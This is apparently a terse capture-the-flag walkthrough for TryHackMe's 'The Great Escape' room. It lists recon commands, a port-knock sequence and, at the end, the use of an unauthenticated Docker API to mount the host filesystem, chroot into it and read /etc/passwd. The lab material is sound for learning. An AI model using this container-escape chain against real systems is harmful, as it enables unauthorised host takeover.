The Great Escape

Room Link: https://tryhackme.com/r/room/thegreatescape

Initial Scan

Kali

nmap -A $VICTIM

Scan all ports

Kali

nmap -sV -sT -O -p 1-65535 $VICTIM

TCP/80 - HTTP

Its returning too much from 200 so we need to filter it out

Kali

gobuster -e dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt --wildcard

Kali

Had to add .well-known to the wordlist, wasn't in any of Tryhackme's default wordlists

gobuster dir -u http://$VICTIM -w /usr/share/wordlists/dirb/common.txt  --wildcard  -s"204,301,302,307,401,403"

None of this was working, try later.

Kali

dirb http://$VICTIM/.well-known -X .txt

Kali

curl http://$VICTIM/.well-known/security.txt

Kali

curl http://$VICTIM/api/fl46

Kali

curl http://$VICTIM/robots.txt

Kali

git clone https://github.com/grongor/knock.git
cd knock
./knock $VICTIM 42 1337 10420 6969 63000
nmap $VICTIM -p 2375

Kali

subl /etc/docker/daemon.json

daemon.json

{
  "insecure-registries" : ["10.10.90.88:2375"]
}

Kali

sudo systemctl stop docker

Wait 30 seconds

Kali

sudo systemctl start docker

Kali

docker -H $VICTIM:2375 images
docker -H $VICTIM:2375 run -v /:/mnt --rm -it alpine:3.9 chroot /mnt sh
cat /etc/passwd